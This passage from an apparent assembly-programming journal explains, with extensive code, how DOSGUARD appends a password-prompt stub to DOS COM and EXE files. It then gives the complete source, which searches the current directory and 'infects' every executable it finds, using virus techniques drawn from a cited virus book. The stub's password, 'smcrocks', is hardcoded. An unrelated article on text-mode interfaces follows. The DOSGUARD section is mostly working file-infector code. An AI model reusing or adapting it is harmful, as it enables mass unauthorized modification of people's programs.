mov word ptr [lps], cx ;Copy Last Page Size into lps
mov cx, word ptr [exehead+4];Copy Num Pages into cx
cmp dx, word ptr [lps] ;If bytes to subtract are less than
jbe FINDLPS ;lps then just subtract them and exit
mov ax, dx
xor dx, dx
mov cx, 512
div cx ;ax = pages to subtract
mov cx, word ptr [exehead+4];dx = remainder to subtract from lps
sub cx, ax
cmp dx, word ptr [lps]
jbe FINDLPS
sub cx, 1 ;remainder > lps, so borrow a page
mov ax, dx
sub ax, word ptr [lps]
mov dx, 512
sub dx, ax ;dx = 512 - (remainder - lps)
mov word ptr [lps], dx ;which is the new last page size
ret
FINDLPS:
sub word ptr [lps], dx ;Subtract start position and leave
;Num Pages the same
ret
Once you know the amount of code you have to move, you have to come up with
a way to simultaneously read and write from the same file without
overwriting data that hasn't been read yet. DOSGUARD's solution is to use a
16 byte buffer. The first pass of the move loop reads 528 bytes and writes
out 512 bytes; every later pass reads 512 more bytes and writes out 512. In
other words, it always reads 16 bytes ahead of where it is writing so that
it doesn't overwrite bytes before they're read. DOSGUARD has a number of
functions for reading and writing pages, reading and writing paragraphs, and
moving the file pointer around. It also has one function for moving the 16
bytes at the end of the 528 byte buffer in memory to the front. Well, I'll
shut up now and show you the code for the move loop.
mov dx, offset buffer
call READ_PAGE
mov dx, offset para
call READ_PARA
call DECFP_PAGE
call WRITE_PAGE
call MOVE_PARA
dec cx
cmp cx, 1
je LASTPAGE
MOVELOOP:
mov dx, offset buffer + 16
call READ_PAGE
call DECFP_PAGE
call WRITE_PAGE
call MOVE_PARA
dec cx
cmp cx, 1
jne MOVELOOP
When DOSGUARD gets to the last page, it finishes things off by reading the
last fraction of a page and then writing out those bytes plus the 16 bytes
that were left buffered from the last iteration of the move loop.
LASTPAGE:
sub word ptr [lps], 16
mov cx, word ptr [lps]
mov dx, offset buffer + 16
mov ah, 3Fh
int 21h
push cx
mov dx, cx
neg dx
mov cx, -1
mov ax, 4201h
int 21h
pop cx
add cx, 16
mov dx, offset buffer
mov ah, 40h
int 21h
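The read-ahead idea is easier to follow in a high-level sketch. The Python below is not a transcription of the move loop (DOSGUARD treats the last partial page as a separate case and keeps its own page counters); it only shows the same trick of holding 16 bytes in reserve so that nothing is overwritten before it has been read. The name shift_tail and the in-memory test file are assumptions made for the example.

```python
import io

PAGE = 512
PARA = 16

def shift_tail(f, start, file_size):
    """Move bytes [start, file_size) of f forward by 16 bytes, in place."""
    f.seek(start)
    carry = b""                        # bytes read but not yet written
    remaining = file_size - start
    while remaining > 0:
        want = min(PAGE + PARA - len(carry), remaining)
        chunk = carry + f.read(want)   # stay 16 bytes ahead of the writes
        remaining -= want
        if remaining == 0:             # last pass: flush everything held
            out, carry = chunk, b""
        else:
            out, carry = chunk[:PAGE], chunk[PAGE:]
        # Step back to the write position, 16 bytes past where this
        # chunk's first byte originally lived.
        f.seek(-(len(chunk) - PARA), io.SEEK_CUR)
        f.write(out)

data = bytes(range(256)) * 9           # 2304 bytes of sample data
f = io.BytesIO(data)
shift_tail(f, 100, len(data))
moved = f.getvalue()
print(len(moved) - len(data))          # 16
print(moved[116:] == data[100:])       # True
```

The 16 bytes at the old start position are left as they were; in DOSGUARD that gap is the new room in the relocation pointer table.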
Last, but not least, there is a little maintenance to do.
;Got to adjust the file size since it will be used later
add word ptr cs:[9Ah], 16
adc word ptr cs:[9Ch], 0
;Increment the header size within the EXE header
add word ptr cs:[exehead+8], 1
;Change Page Count and Last Page Size in EXE header
cmp word ptr [exehead+2], 496
jae ADDPAGE
add word ptr [exehead+2], 16
jmp HAVEROOM
Oh yeah, there is one more condition that needs to be handled here. If the
last page was almost full (496 or more bytes), then adding 16 bytes to the
file size will overflow that page so you have to add a whole new page.
ADDPAGE:
;Adjust the header to add a page if the 16 additional bytes run
;over to a new page.
inc word ptr [exehead+4]
mov ax, 512
sub ax, word ptr [exehead+2]
mov dx, 16
sub dx, ax
mov word ptr [exehead+2], dx
EXE MODIFICATION - STEP 9
-------------------------
Whew! Step 8 was a doozy, but now we're almost done. All Step 9 requires of
us is to save the original segment values from our victim. DOSGUARD saves
these values in the order that they are found within the EXE header.
mov ax, word ptr [exehead+14] ;save orig stack segment
mov [hosts], ax
mov ax, word ptr [exehead+16] ;save orig stack pointer
mov [hosts+2], ax
mov ax, word ptr [exehead+20] ;save orig ip
mov [hostc], ax
mov ax, word ptr [exehead+22] ;save orig cs
mov [hostc+2], ax
EXE MODIFICATION - STEP 10
--------------------------
It will make things a little easier later on if the end of the file we are
about to modify lies on a paragraph boundary. This way the starting ip for
the new code that we're adding will always be zero.
;adjust file length to paragraph boundary
mov cx, word ptr cs:[9Ch]
mov dx, word ptr cs:[9Ah]
or dl, 0Fh
add dx, 1
adc cx, 0
mov cs:[9Ch], cx
mov cs:[9Ah], dx
mov ax, 4200h ;move file pointer to end of file
int 21h ;plus boundary
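The "or dl, 0Fh / add dx, 1 / adc cx, 0" sequence is a compact way of moving to the next paragraph boundary. A short Python sketch of the same arithmetic on a 32 bit size (the function name is made up):

```python
def next_paragraph(size):
    """Mirror 'or dl,0Fh / add dx,1 / adc cx,0' on a 32-bit file size."""
    return ((size | 0x0F) + 1) & 0xFFFFFFFF

for size in (0x1234, 0x1230, 0xFFFF):
    print(hex(size), "->", hex(next_paragraph(size)))
# 0x1234 -> 0x1240
# 0x1230 -> 0x1240
# 0xffff -> 0x10000
```

Note the second case: a file that already ends on a paragraph boundary is still pushed out by a full 16 bytes. That is harmless, since the Step 4 test and the header fields are all computed from the padded size.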
EXE MODIFICATION - STEP 11
--------------------------
Finally, we can write our code to the file. Just like with the COM file, we
will write our code to the end of the file. The difference is in how we get
there when it's time to execute it. With COM files we used a jump. With EXE
files we adjust the starting cs:ip to point to our code.
mov cx, offset ENDGUARD2 - offset EXEGUARD ;write code to end
mov dx, offset EXEGUARD ;of the exe file
mov ah, 40h
int 21h
EXE MODIFICATION - STEP 12
--------------------------
With our code neatly tucked after the host program's code, it's time to
modify the EXE header so that our code is the first to execute. We also have
to adjust the size fields in the EXE header to take into account all the
code we just added.
The first thing to do is figure out what the starting segment values need to
be. The starting cs will simply be the original file size (as padded in
Step 10) divided by 16 minus the header size in paragraphs. The initial ip
will be 0 because of Step 10. In DOSGUARD's case the ss will be the same as
the cs and the sp will point to an address 256 bytes after the end of our
code. 256 bytes is plenty of room for DOSGUARD's stack.
mov ax, word ptr cs:[9Ah] ;calculate module's CS
mov dx, word ptr cs:[9Ch] ;dx:ax contains orig file size
mov cx, 16 ;CS = file size / 16 - header size
div cx
sub ax, word ptr [exehead+8];header size in paragraphs
mov word ptr [exehead+22], ax ;ax is now initial cs
mov word ptr [exehead+14], ax ;ax is now initial ss
mov word ptr [exehead+20], 0 ;initial ip
mov word ptr [exehead+16], ENDGUARD2 - EXEGUARD + 100h ;initial sp
This next bit of code calculates the new file size, in pages of course.
;calculate new file size
mov dx, word ptr cs:[9Ch]
mov ax, word ptr cs:[9Ah]
add ax, offset ENDGUARD2 - offset EXEGUARD + 200h
adc dx, 0
mov cx, 200h
div cx
mov word ptr [exehead+4], ax
mov word ptr [exehead+2], dx
add word ptr [exehead+6], 2
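To see what ends up in the header, the two calculations above can be replayed with ordinary integers. A Python sketch with made-up numbers; padded_size is the file size after Step 10, guard_len stands in for ENDGUARD2 - EXEGUARD, and the function name is mine:

```python
def new_header_fields(padded_size, header_paras, guard_len):
    """Return (initial cs/ss, initial sp, page count, last page size)."""
    init_cs = padded_size // 16 - header_paras   # segment just past the host
    init_sp = guard_len + 0x100                  # 256 bytes of stack
    # Adding 200h before dividing counts the partial last page as a page.
    num_pages, last_page = divmod(padded_size + guard_len + 0x200, 0x200)
    return init_cs, init_sp, num_pages, last_page

# Hypothetical file: 512-byte header plus a host image of 0x1230 bytes,
# with a 300-byte guard module to be appended.
cs, sp, pages, last = new_header_fields(0x1430, 32, 300)
print(hex(cs), sp, pages, last)   # 0x123 556 11 348
```

As a cross-check, 10 full pages plus 348 bytes is 5468 bytes, which is 0x1430 + 300.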
EXE MODIFICATION - STEP 13
--------------------------
Now, we should be through with the header so we can write it back out to
the file.
;Write out the new header
mov cx, 1Ch
mov dx, offset exehead
mov ah, 40h
int 21h
EXE MODIFICATION - STEP 14
--------------------------
Last, but not least, we have to modify the relocation pointer table. First,
we need to move the file pointer to where we need to add the new entries.
mov ax, word ptr [exehead+6];Get the # of relocatables
dec ax ;Position to add relocatable equals
dec ax ;(# - 2)*4 + table offset
mov cx, 4
mul cx
add ax, word ptr [exehead+24]
adc dx, 0
mov cx, dx
mov dx, ax
mov ax, 4200h ;move file pointer to position
int 21h
Now, we have to add two pointers to the table. The first points to "hosts,"
which is the stack segment of the original program. The second points to
"hostc+2," which holds the original program's code segment.
;Use exehead as a buffer for relocatables.
;Put two pointers in this buffer, first points to ss in
;hosts and second points to cs in hostc.
mov word ptr [exehead], ENDGUARD2 - EXEGUARD - 10
mov ax, word ptr [exehead+22]
mov word ptr [exehead+2], ax
mov word ptr [exehead+4], ENDGUARD2 - EXEGUARD - 4
mov word ptr [exehead+6], ax
mov cx, 8
mov dx, offset exehead
mov ah, 40h ;Write the 8 bytes.
int 21h
mov ah, 3Eh ;Close the file.
int 21h
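Each relocation entry is an offset word followed by a segment word, so the 8 bytes written above can be modeled directly. A Python sketch with made-up values; reloc_count_new is the count after the "add ..., 2" in Step 12, guard_len stands in for ENDGUARD2 - EXEGUARD, and the function name is mine:

```python
import struct

def reloc_patch(reloc_count_new, reloc_offset, init_cs, guard_len):
    """Return (file position, 8 bytes) for the two new relocation entries."""
    pos = (reloc_count_new - 2) * 4 + reloc_offset
    entries = struct.pack(
        "<4H",
        guard_len - 10, init_cs,   # points at hosts   (original ss)
        guard_len - 4, init_cs,    # points at hostc+2 (original cs)
    )
    return pos, entries

pos, entries = reloc_patch(7, 0x1C, 0x123, 300)
print(pos)                              # 48
print(struct.unpack("<4H", entries))    # (290, 291, 296, 291)
```

The offsets 10 and 4 come from the data layout at the end of the module: hosts (2 words), hostc (2 words) and delta (1 word) are the last 10 bytes before ENDGUARD2.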
RESPONSIBILITIES OF INSERTED CODE
---------------------------------
There are several items which the code module we added must take into
consideration. First of all, when it is finished, the state of registers,
etc. must be exactly what the original program would expect them to be. For
instance, ax is set by DOS to indicate whether or not the Drive ID stored in
the FCBs is valid. So, the value of ax must be preserved by our code. Also,
the original program may expect other registers to be set to initial values
of zero. And of course, the segment registers need to be restored after our
code's execution.
In order to actually restore control to the host, our code must restore ss
and sp to their original values. Then, it jumps to the original cs:ip.
Also, inserted code can't be dependent on absolute addresses for its data.
Therefore, DOSGUARD accesses all data by its offset from the end of the
file.
CONCLUSION
----------
Hopefully, I've explained the techniques I used in developing DOSGUARD well
enough for you to develop your own binary modifying programs. As I mentioned
at the beginning of this article, DOSGUARD has a lot of room for
improvement. If you are interested then you should check out my web page and
download the source for ENCGUARD, a more secure version of DOSGUARD. A nice
way to extend DOSGUARD would be to improve on the encryption techniques used
in ENCGUARD. If I ever find the time I would like to write a Win32 version
of DOSGUARD which could safely modify the PE file format. If I ever do
embark on such a task, I'll be sure to let the readers of Assembly
Programming Journal know about it.
REFERENCES
----------
"The Giant Black Book of Computer Viruses, 2nd edition" by Mark Ludwig
CONTACT INFORMATION
-------------------
email: jjsimpso@...
web page: http://www4.ncsu.edu/~jjsimpso/index.html
Check out my web page for more information on my research into code
modification. Also, feel free to email me with ideas, corrections,
improvements, etc.
---------------------------BEGIN DOSGUARD.ASM----------------------------------
.model tiny
.code
ORG 100h
START:
jmp BEGINCODE ;Jump the identification string
DB 'CG'
BEGINCODE:
mov dx, offset filter1
call FIND_FILES
mov dx, offset filter2
call FIND_FILES
mov ax, 4C00h ;DOS terminate
int 21h
;-------------------------------------------------------------------------
;Procedure to find and then infect files
;-------------------------------------------------------------------------
FIND_FILES:
mov ah, 4Eh ;Search for files matching filter
int 21h
SLOOP:
jc DONE
mov ax, 3D02h ;Open file R/W
mov dx, 9Eh ;Filename, stored in DTA
int 21h
mov bx, ax ;Save file handle in bx
mov ax, 3F00h ;Read first 5 bytes from file
mov cx, 5
mov dx, offset obytes
int 21h
;Check to see if file is really an EXE
cmp word ptr[obytes], 'ZM'
je EXE
COM:
;Check to see if file is already infected
;if it is, then skip it
cmp word ptr [obytes + 3], 'GC'
je NO_INFECT
;Make sure file isn't too large
mov ax, ds:[009Ah] ;Size of file
add ax, offset ENDGUARD - offset COMGUARD + 100h
jc NO_INFECT ;If ax overflows then don't infect
;If we made it this far then we know the file is safe to modify
call INFECT_COM
jmp NO_INFECT
EXE:
;Read the EXE Header
call READ_HEADER
jc NO_INFECT ;error reading file so skip it
;Make sure it hasn't already been infected
;If (initial CS * 16) + (size of EXEGUARD) + (size of header) == size
; then the file has already been infected
mov ax, word ptr [exehead+22]
mov dx, 16
mul dx
add ax, offset ENDGUARD2 - offset EXEGUARD
adc dx, 0
mov cx, word ptr [exehead+8]
add cx, cx
add cx, cx
add cx, cx
add cx, cx
add ax, cx
adc dx, 0
cmp ax, word ptr cs:[9Ah]
jne EXEOK
cmp dx, word ptr cs:[9Ch]
je NO_INFECT
EXEOK:
;Make sure Overlay Number is 0
cmp word ptr [exehead+26], 0
jnz NO_INFECT
;Make sure it is a DOS EXE (as opposed to windows or OS/2)
cmp word ptr [exehead+24], 40h
jae NO_INFECT
call INFECT_EXE
NO_INFECT:
mov ax, 4F00h ;Find next file
int 21h
jmp SLOOP
DONE:
ret
;-------------------------------------------------------------------------
;Procedure to infect COM files
;-------------------------------------------------------------------------
INFECT_COM:
xor cx, cx ;cx = 0
xor dx, dx ;dx = 0
mov ax, 4202h ;Move file pointer to the end of file
int 21h
mov ax, 4000h ;Write the code to the end of file
mov dx, offset COMGUARD
mov cx, offset ENDGUARD - offset COMGUARD
int 21h
mov ax, 4200h ;Move file pointer to beginning of
xor cx, cx ; file to write jump
xor dx, dx
int 21h
;Prepare the jump instruction to be written to beginning of file
xor ax, ax
mov byte ptr [bytes], 0E9h ;opcode for jmp
mov ax, ds:[009Ah] ;size of the file
sub ax, 3 ;size of the jump instruction
mov word ptr [bytes + 1], ax;size of the jump
;Write the jump
mov cx, 5; ;size to be written
mov dx, offset bytes
mov ax, 4000h
int 21h
mov ah, 3Eh ;Close file
int 21h
ret
;-------------------------------------------------------------------------
;Procedure to infect EXE files
;-------------------------------------------------------------------------
INFECT_EXE:
;Check the relocation pointer table to see if there is
;room. If there isn't then we'll have to make room.
mov ax, word ptr [exehead+8];size of header in paragraphs
add ax, ax ;
add ax, ax ;Convert to double words.
sub ax, word ptr [exehead+6];Subtract # of entries each of
add ax, ax ;which is a double word and then
add ax, ax ;convert the final total to bytes.
sub ax, word ptr [exehead+24];If there are 8 bytes left after
cmp ax, 8 ;you subtract the offset to the
jc NOROOM ;reloc table then there is room.
jmp HAVEROOM
NOROOM:
;Not enough room in the relocation table so we are going to
;have to add a paragraph to the table. As a result, we must
;read in the whole file after the relocation table and write
;it back out one paragraph down in memory.
xor cx, cx ;Move the file pointer to the end of
mov dx, word ptr [exehead+24] ;the relocation pointer table.
mov ax, word ptr [exehead+6];size of relocation table in doubles
add ax, ax ;* 4 to get bytes
add ax, ax
add dx, ax ;add that to start of table
push dx
mov ax, 4200h
int 21h
pop dx
call CALC_SIZE
cmp cx, 1
je LASTPAGE
mov dx, offset buffer
call READ_PAGE
mov dx, offset para
call READ_PARA
call DECFP_PAGE
call WRITE_PAGE
call MOVE_PARA
dec cx
cmp cx, 1
je LASTPAGE
MOVELOOP:
mov dx, offset buffer + 16
call READ_PAGE
call DECFP_PAGE
call WRITE_PAGE
call MOVE_PARA
dec cx
cmp cx, 1
jne MOVELOOP
LASTPAGE:
sub word ptr [lps], 16
mov cx, word ptr [lps]
mov dx, offset buffer + 16
mov ah, 3Fh
int 21h
push cx
mov dx, cx
neg dx
mov cx, -1
mov ax, 4201h
int 21h
pop cx
add cx, 16
mov dx, offset buffer
mov ah, 40h
int 21h
;Got to adjust the file size since it will be used later
add word ptr cs:[9Ah], 16
adc word ptr cs:[9Ch], 0
;Increment the header size within the EXE header
add word ptr cs:[exehead+8], 1
;Change Page Count and Last Page Size in EXE header
cmp word ptr [exehead+2], 496
jae ADDPAGE
add word ptr [exehead+2], 16
jmp HAVEROOM
ADDPAGE:
;Adjust the header to add a page if the 16 additional bytes run
;over to a new page.
inc word ptr [exehead+4]
mov ax, 512
sub ax, word ptr [exehead+2]
mov dx, 16
sub dx, ax
mov word ptr [exehead+2], dx
HAVEROOM:
mov ax, word ptr [exehead+14] ;save orig stack segment
mov [hosts], ax
mov ax, word ptr [exehead+16] ;save orig stack pointer
mov [hosts+2], ax
mov ax, word ptr [exehead+20] ;save orig ip
mov [hostc], ax
mov ax, word ptr [exehead+22] ;save orig cs
mov [hostc+2], ax
mov cx, word ptr cs:[9Ch] ;adjust file length to paragraph
mov dx, word ptr cs:[9Ah] ; boundary
or dl, 0Fh
add dx, 1
adc cx, 0
mov cs:[9Ch], cx
mov cs:[9Ah], dx
mov ax, 4200h ;move file pointer to end of file
int 21h ;plus boundary
mov cx, offset ENDGUARD2 - offset EXEGUARD ;write code to end
mov dx, offset EXEGUARD ;of the exe file
mov ah, 40h
int 21h
xor cx, cx ;Move file pointer to beginning of file
xor dx, dx
mov ax, 4200h
int 21h
;adjust the EXE header and then write it back out
mov ax, word ptr cs:[9Ah] ;calculate module's CS
mov dx, word ptr cs:[9Ch] ;dx:ax contains orig file size
mov cx, 16 ;CS = file size / 16 - header size
div cx
sub ax, word ptr [exehead+8];header size in paragraphs
mov word ptr [exehead+22], ax ;ax is now initial cs
mov word ptr [exehead+14], ax ;ax is now initial ss
mov word ptr [exehead+20], 0 ;initial ip
mov word ptr [exehead+16], ENDGUARD2 - EXEGUARD + 100h ;initial sp
mov dx, word ptr cs:[9Ch] ;calculate new file size
mov ax, word ptr cs:[9Ah]
add ax, offset ENDGUARD2 - offset EXEGUARD + 200h
adc dx, 0
mov cx, 200h
div cx
mov word ptr [exehead+4], ax
mov word ptr [exehead+2], dx
add word ptr [exehead+6], 2
mov cx, 1Ch ;Write out the new header
mov dx, offset exehead
mov ah, 40h
int 21h
;modify relocatables table
mov ax, word ptr [exehead+6];Get the # of relocatables
dec ax ;Position to add relocatable equals
dec ax ;(# - 2)*4 + table offset
mov cx, 4
mul cx
add ax, word ptr [exehead+24]
adc dx, 0
mov cx, dx
mov dx, ax
mov ax, 4200h ;move file pointer to position
int 21h
;Use exehead as a buffer for relocatables.
;Put two pointers in this buffer, first points to ss in
;hosts and second points to cs in hostc.
mov word ptr [exehead], ENDGUARD2 - EXEGUARD - 10
mov ax, word ptr [exehead+22]
mov word ptr [exehead+2], ax
mov word ptr [exehead+4], ENDGUARD2 - EXEGUARD - 4
mov word ptr [exehead+6], ax
mov cx, 8
mov dx, offset exehead
mov ah, 40h ;Write the 8 bytes.
int 21h
mov ah, 3Eh ;Close the file.
int 21h
ret ;Done!
;-------------------------------------------------------------------------
;Procedure to calculate the amount that needs to be written
;-------------------------------------------------------------------------
CALC_SIZE:
;dx holds the position in the file where we want to start reading.
;So, the amount to read in and write back out is equal to the size
;of the file minus dx.
mov cx, word ptr [exehead+2]
mov word ptr [lps], cx ;Copy Last Page Size into lps
mov cx, word ptr [exehead+4];Copy Num Pages into cx
cmp dx, word ptr [lps] ;If bytes to subtract are less than
jbe FINDLPS ;lps then just subtract them and exit
mov ax, dx
xor dx, dx
mov cx, 512
div cx ;ax = pages to subtract
mov cx, word ptr [exehead+4];dx = remainder to subtract from lps
sub cx, ax
cmp dx, word ptr [lps]
jbe FINDLPS
sub cx, 1 ;remainder > lps, so borrow a page
mov ax, dx
sub ax, word ptr [lps]
mov dx, 512
sub dx, ax ;dx = 512 - (remainder - lps)
mov word ptr [lps], dx ;which is the new last page size
ret
FINDLPS:
sub word ptr [lps], dx ;Subtract start position and leave
;Num Pages the same
ret
;-------------------------------------------------------------------------
;Procedure to read the EXE Header
;-------------------------------------------------------------------------
READ_HEADER:
xor cx, cx ;Move the file pointer back
xor dx, dx ;to the beginning of the file
mov ax, 4200h
int 21h
mov cx, 1Ch ;read exe header (28 bytes)
mov dx, offset exehead ;into buffer
mov ah, 3Fh
int 21h
ret ;return with cf set properly
;-------------------------------------------------------------------------
;Procedure to read a page
;-------------------------------------------------------------------------
READ_PAGE:
push ax
push cx
mov ah, 3Fh
mov cx, 512
int 21h
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to read a paragraph
;-------------------------------------------------------------------------
READ_PARA:
push ax
push cx
mov ah, 3Fh
mov cx, 16
int 21h
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to write a page
;-------------------------------------------------------------------------
WRITE_PAGE:
push ax
push cx
push dx
mov ah, 40h
mov cx, 512
mov dx, offset buffer
int 21h
pop dx
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to write a paragraph
;-------------------------------------------------------------------------
WRITE_PARA:
push ax
push cx
push dx
mov ah, 40h
mov cx, 16
mov dx, offset buffer
int 21h
pop dx
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to move file pointer back a page
;-------------------------------------------------------------------------
DECFP_PAGE:
push ax
push cx
push dx
mov ax, 4201h
mov cx, -1
mov dx, -512
int 21h
pop dx
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to move file pointer back a para
;-------------------------------------------------------------------------
DEC_PARA:
push ax
push cx
push dx
mov ax, 4201h
mov cx, -1
mov dx, -16
int 21h
pop dx
pop cx
pop ax
ret
;-------------------------------------------------------------------------
;Procedure to move the paragraph buffer to the front
;-------------------------------------------------------------------------
MOVE_PARA:
push cx
mov si, offset para
mov di, offset buffer
mov cx, 16
rep movsb
pop cx
ret
;-------------------------------------------------------------------------
;Code to add to COM files
;-------------------------------------------------------------------------
COMGUARD:
call GET_START
GET_START:
pop bp
sub bp, offset GET_START
mov ah, 9h ;DOS print string
lea dx, [bp + prompt] ;Print the password prompt
int 21h
lea di, [bp + guess]
xor cx, cx
READLOOP:
mov ah, 7h ;Read without echo
int 21h
inc cx ;Count of characters entered
stosb ;Store guess for comparison later
cmp cx, 10 ;Limit guess to 10 chars including CR
je CHECKPASS
cmp al, 13 ;Quit loop when CR read
jne READLOOP
CHECKPASS:
lea di, [bp + guess] ;Setup for passwd checking loop
lea si, [bp +passwd] ;Setup addresses for cmpsb
xor cx, cx ;Set counter to zero
cld ;Tell cmpsb to increment si and di
CHECKLOOP:
cmpsb ;Compare passwd with guess
jne FAIL ;Abort program if password is wrong
inc cx ;Increment counter
cmp cx, 8 ;Only check first 8 chars
jne CHECKLOOP ;Loop until you've read first 8
SUCCESS:
mov cx, 5
cld
lea si, [bp + obytes]
mov di, 100h
rep movsb
push 100h ;return from the jump to execute
ret ;the host program
FAIL:
mov ah, 9h ;DOS print string
lea dx, [bp + badpass] ;Print bad password msg
int 21h
mov ax, 4C00h
int 21h
prompt DB 'password: ','$'
badpass DB 'Invalid password!','$'
passwd DB 'smcrocks'
guess DB 10 dup (0)
obytes DB 0,0,0,0,0
ENDGUARD:
;-------------------------------------------------------------------------
;Code to add to EXE files
;-------------------------------------------------------------------------
EXEGUARD:
push ax ;Save startup value in ax
push ds ;Save value of ds
mov ax, cs ;Put cs into ds and es
mov ds, ax
mov es, ax
mov bp, offset ENDGUARD2 - offset EXEGUARD
mov ax, [bp-4]
mov ah, 9h ;DOS print string
lea dx, [bp-57] ;Print the password prompt
int 21h
lea di, [bp-20]
xor cx, cx
EREADLOOP:
mov ah, 7h ;Read without echo
int 21h
inc cx ;Count of characters entered
stosb ;Store guess for comparison later
cmp cx, 10 ;Limit guess to 10 chars including CR
je ECHECKPASS
cmp al, 13 ;Quit loop when CR read
jne EREADLOOP
ECHECKPASS:
lea di, [bp-20] ;Setup for passwd checking loop
lea si, [bp-28] ;Setup addresses for cmpsb
xor cx, cx ;Set counter to zero
cld ;Tell cmpsb to increment si and di
ECHECKLOOP:
cmpsb ;Compare passwd with guess
jne EFAIL ;Abort program if password is wrong
inc cx ;Increment counter
cmp cx, 8 ;Only check first 8 chars
jne ECHECKLOOP ;Loop until you've read first 8
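ESUCCESS:
xor cx, cx ;Zero the scratch registers first
xor dx, dx
xor si, si
xor di, di
lahf ;Clear the low flag byte while ah is
xor ah, ah ;still free to use
sahf
pop ds ;pop and mov leave the flags alone
mov ax, ds
mov es, ax
pop ax ;Restore the startup value of ax intact
cli
mov ss, word ptr cs:[bp-10]
mov sp, word ptr cs:[bp-8]
sti
mov bp, 0 ;mov, not xor, so the flags stay cleared
jmp dword ptr cs:[ENDGUARD2-EXEGUARD-6]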
EFAIL:
mov ah, 9h ;DOS print string
lea dx, [bp-46] ;Print bad password msg
int 21h
mov ax, 4C00h
int 21h
eprompt DB 'password: ','$'
ebadpass DB 'Invalid password!','$'
epasswd DB 'smcrocks'
eguess DB 10 dup (0)
hosts DW 0, 0
hostc DW 0, 0
delta DW 0
ENDGUARD2:
filter1 DB '*.com',0
filter2 DB '*.exe',0
bytes DB 0,0,0,'CG'
exehead DB 28 dup (0)
buffer DB 512 dup (0)
para DB 16 dup (0)
lps DW 0
END START
---------------------------END DOSGUARD.ASM------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Creating a User-Friendly Interface
by S Sirajudeen
Nowadays, a programmer in any language has to build user-friendly features
into commercial software, because users expect software to be easy to use.
For example, Windows is the most popular OS due to its Graphical User
Interface.
For an assembly language programmer who tries to develop a DOS-based
program, it is tedious and challenging to incorporate even a few basic
features of a graphical interface like that of Windows.
Sometimes, in assembly language, developing the core of a program takes
much less time than writing the code for its user interface. For instance,
assume that we're writing an addition program which displays a dialog box to
input two numbers and displays the result in a dialog box. Here, the dialog
box is the user interface. What we have to do in this program is:
* Display a dialog box.
* Receive the numbers to be added as strings.
* Check whether each string contains letters or graphics characters. If
so, prompt the user to reenter the numbers.
* Convert the ASCII digits into binary form.
* Perform binary multibyte addition.
* Convert the sum, which is binary, into ASCII digits.
* Display the sum in a dialog box.
Our only goal is the addition of two numbers, yet we have to spend more time
on the user interface design than on the addition itself.
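To make the middle steps of that list concrete, here is a rough sketch of the validation and the two conversions in Python, chosen only because it is compact; an assembly version would walk the same loops a byte at a time. The function names are made up for this illustration.

```python
def parse_number(text):
    """Return the value of a string of ASCII digits, or None if the
    string is empty or contains anything that is not a digit."""
    if not text or any(ch < "0" or ch > "9" for ch in text):
        return None
    value = 0
    for ch in text:
        value = value * 10 + (ord(ch) - ord("0"))   # ASCII digit -> binary
    return value

def format_number(value):
    """Convert a non-negative binary value back into ASCII digits."""
    digits = []
    while True:
        value, rem = divmod(value, 10)
        digits.append(chr(ord("0") + rem))
        if value == 0:
            break
    return "".join(reversed(digits))                # digits come out backwards

a, b = parse_number("999"), parse_number("1")
print(format_number(a + b))     # 1000
print(parse_number("12a"))      # None, so the user would be asked again
```

Everything else in the list (drawing the box, reading the keys, showing the result) is user interface work, which is the point of the paragraph above.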
After hearing all this, you may become frustrated and decide to skip user
interface design. Still, when developing utilities or packages for
commercial purposes, a programmer will have to do these things to
accommodate users. This is why I present this article.
This article will focus on user-friendly features in DOS text mode. In DOS
text mode, user-friendly means features such as menus, message boxes, dialog
boxes, list boxes, text windows, radio buttons, status bars, mouse support,
etc.
In this article, I will cover only an "about" message box and a dialog box.
However, knowledge of interrupts (for screen and mouse handling) is
essential, even for a C/C++ programmer, to incorporate user-friendly
features in a DOS-based program.
GETTING STARTED:
Before going on, a few things must be made clear.
i) Text can be displayed in one of the following ways:
1) Direct access to video memory
2) Using INT 21h
3) Using INT 10h
In the examples in this article, I have used function 0Eh of INT 10h
to display text.
ii) To keep the example programs straightforward, I have used |, -
and + as the box characters in the dialog box, since the actual box
characters are EXTENDED ASCII characters which are not allowed in a text
article. The content of the dialog box is labeled DIALOG_BOX_TEXT.
Before assembling this program, PLEASE REPLACE the characters |, - and +
in the content of the dialog box with the BOX CHARACTERS which are
specified below.
--------------------------------------
ASCII code   Stand-in   Description
--------------------------------------
179          |          Vertical bar
196          -          Horizontal bar
218          +          Upper left corner
191          +          Upper right corner
192          +          Lower left corner
217          +          Lower right corner
--------------------------------------
EXAMPLE 1:
First of all, we're going to put a zooming message box in our program. It
serves as an introduction to the second example.
You may have seen that some utilities, such as Norton Utilities, display a
zooming message box to alert users.
What this program does is:
- n boxes of different sizes are displayed continuously, one after
another, for n seconds each. Each box is larger than the previous
one, so it looks like the box is zooming.
LOGIC:
Displaying a box that is larger than the previously displayed box
amounts to enlarging (zooming) the previously displayed box.
i) Zoom the box by n rows
ii) Zoom the box by n columns
iii) Repeat the zoom n times
- It displays horizontal and vertical shadows for the box
- Finally, it displays the text within the box
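The zoom logic can be pictured as a list of ever larger rectangles. The Python sketch below is only an illustration of that idea: the starting corners are borrowed from the upper_x, upper_y, lower_x and lower_y equates in the listing (assuming x is the row and y is the column), while the step sizes, the symmetric growth and the 80x25 screen limits are my own assumptions and not taken from MSGBOX.ASM.

```python
def zoom_boxes(top, left, bottom, right, steps, row_step=1, col_step=4,
               max_row=24, max_col=79):
    """Yield (top, left, bottom, right) for each successively larger box."""
    for _ in range(steps):
        top = max(top - row_step, 0)               # grow upward
        bottom = min(bottom + row_step, max_row)   # grow downward
        left = max(left - col_step, 0)             # grow to the left
        right = min(right + col_step, max_col)     # grow to the right
        yield top, left, bottom, right

for box in zoom_boxes(8, 37, 8, 39, steps=3):
    print(box)
# (7, 33, 9, 43)
# (6, 29, 10, 47)
# (5, 25, 11, 51)
```

Drawing each rectangle in turn, with a short delay between them, gives the zooming effect; the shadows and the text are added only after the last one.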
What you will learn:
i) Screen handling using BIOS interrupt 10h
ii) The groundwork needed for the second example.
